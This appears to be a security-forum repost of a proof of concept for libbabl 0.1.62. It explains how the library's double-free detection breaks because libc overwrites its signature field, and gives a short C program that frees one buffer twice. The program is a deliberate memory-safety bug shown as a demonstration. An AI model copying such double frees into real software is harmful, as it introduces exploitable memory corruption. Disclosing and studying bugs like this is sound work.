Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

libbabl 0.1.62 - Broken Double Free Detection (PoC)

 Share


Recommended Posts

# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Date: December 14, 2020
# Exploit Author: Carter Yagemann
# Vendor Homepage: https://www.gegl.org
# Software Link: https://www.gegl.org/babl/
# Version: libbabl 0.1.62 and newer
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c

/*
 * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
 * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
 *
 * typedef struct
 * {
 *   char  *signature;
 *   size_t size;
 *   int  (*destructor)(void *ptr);
 * } BablAllocInfo;
 *
 *
 * signature is used to track whether a chunk was allocated by babl, and if so, whether
 * it is currently allocated or freed. This is done by either pointing it to the global
 * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
 *
 * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
 *
 * void
 * babl_free (void *ptr,
 *            ...)
 * {
 *   ...
 *       if (freed == BAI (ptr)->signature)
 *         fprintf (stderr, "\nbabl:double free detected\n");
 *
 *
 * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
 * and free(), which has its own data that it stores within freed chunks, most systems will
 * overwrite babl's signature variable upon freeing, breaking the double free detection.
 * The simple PoC below demonstrates this:
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#include <babl/babl-memory.h>

int main(int argc, char **argv) {
    void *buf = babl_malloc(42);
    babl_free(buf);
    // BUG: reports an "unknown" pointer warning when the following is clea=
rly a double free
    babl_free(buf);

    return 0;
}
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...